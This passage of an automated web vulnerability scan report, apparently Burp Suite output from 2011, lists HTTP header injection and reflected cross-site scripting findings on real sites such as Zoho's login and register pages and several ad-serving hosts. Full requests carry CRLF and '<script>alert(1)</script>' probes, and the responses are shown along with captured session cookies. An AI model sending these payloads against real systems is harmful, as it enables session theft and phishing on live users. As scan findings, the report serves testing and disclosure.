Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:08 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdzaw8DAqJfyVjeXQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsAG6pFWY%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1p7%2FX7bcZWBg1Et5q5sLEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWQoCW3awQgTBjIUhDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAg7Jacg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Location: http://2f2f5
3a2cc9ab32b
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


2.11. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Request

GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7YyHDLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwA5%2FRZh; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfydsZDkBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSCjT2irJSNMGMiQEdq0A5lvI7RpEzLfQpnrLzKfWSneBdk8RgYOmTp1dIu4WidhCNU3oAtxJ%2BxCF%2BJ8vBxT1U50Ib6Kt%2BhCsmYX0YUA271YNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Location: http://2bdae
32111a498f8
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


3. Cross-site scripting (reflected)
There are 313 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



3.1. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.cocbc11'%3b9fabd1aa3a3 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:58:11 GMT
Server: ZWS
Content-Length: 20982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
xOf("http://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}


var enableReload = true;
var serviceurl = 'http://duck.cocbc11';9fabd1aa3a3';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

3.2. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.codec4c'><a%20b%3dc>57f8520d9a7 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:58:06 GMT
Server: ZWS
Content-Length: 21044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://duck.codec4c'><a b=c>57f8520d9a7' type="hidden">
...[SNIP]...

3.3. https://accounts.zoho.com/register [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fd5eb9'%3b1be191a250d HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=e664ef78-f1ac-43cb-a39a-487d1de27edd; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948242860; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=47F52FEAAF426CCC55DE7DA90AD3BBD3; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:22 GMT
Server: ZWS
Content-Length: 33949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
A-Za-z0-9]/;
var endWithPat = /[A-Za-z0-9]$/;
var contDots = /([._][._])+/;
var validChars = /^[A-Za-z0-9_\.]+$/;
var onlyNumbers = /^[0-9]+$/
var serviceurl = 'http://www.zoho.com/d5eb9';1be191a250d';
var servicename ='AaaServer';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=e664ef78-f1ac-43cb-a39a-487d1de27edd';

function de(id) {

...[SNIP]...

3.4. https://accounts.zoho.com/register [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fe5e26"><a%20b%3dc>81b0dd0d3be HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=6036367f-1895-4835-8529-daacea5ef066; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948230872; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=E12CEA8FE7E699AF8388FFDD871E4559; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:10 GMT
Server: ZWS
Content-Length: 33998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<span onclick="window.parent.location.href='http://www.zoho.com/e5e26"><a b=c>81b0dd0d3be';">
...[SNIP]...

3.5. https://accounts.zoho.com/register [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fa6505'><a%20b%3dc>3e0edf48d9e HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=65722aa7-5f18-437c-bf15-1297f4069921; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948238307; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=D7A70DBB831B5F632AFFDE7C92B233B1; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:17 GMT
Server: ZWS
Content-Length: 33998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<input name="serviceurl" value='http://www.zoho.com/a6505'><a b=c>3e0edf48d9e' type="hidden">
...[SNIP]...

3.6. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=11287695f6c7<script>alert(1)</script>9faa69a0bfd&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:39 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "11287695f6c7<script>alert(1)</script>9faa69a0bfd"

   
                                                           </head>
...[SNIP]...

3.7. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720ce49b--><script>alert(1)</script>7267909dc51&pid=1128769&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3257


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1430720ce49b--><script>alert(1)</script>7267909dc51" -->
...[SNIP]...

3.8. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=1128769&ps=-178c7f--><script>alert(1)</script>c5a78cccd8b&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:02 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3696


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-178c7f--><script>alert(1)</script>c5a78cccd8b" -->
   
...[SNIP]...

3.9. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/gettoken/

Request

GET /tracking.aspx/gettoken/?callback=this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46&noCacheIE=1298762276937 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:10 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:09 GMT
Content-Length: 137

this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46({"ClientID":"2","Token":"d3a7e42c-0813-438b-a35b-6ce10d72ee05"});

3.10. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitevents/

Request

GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762276936)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762279411 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:31 GMT
Content-Length: 90

this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f({"Result":"1"});

3.11. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitsession/

Request

GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:30 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:29 GMT
Content-Length: 212

this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986({"Session":"84f479f4-e135-4bfd-8e26-2c450d11bf62","SessionDurationInMinutes":"15","NumofEventsinaSubmit":"30","SubmitDuration":"5000"});

3.12. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:31:59 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0">
...[SNIP]...

3.13. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

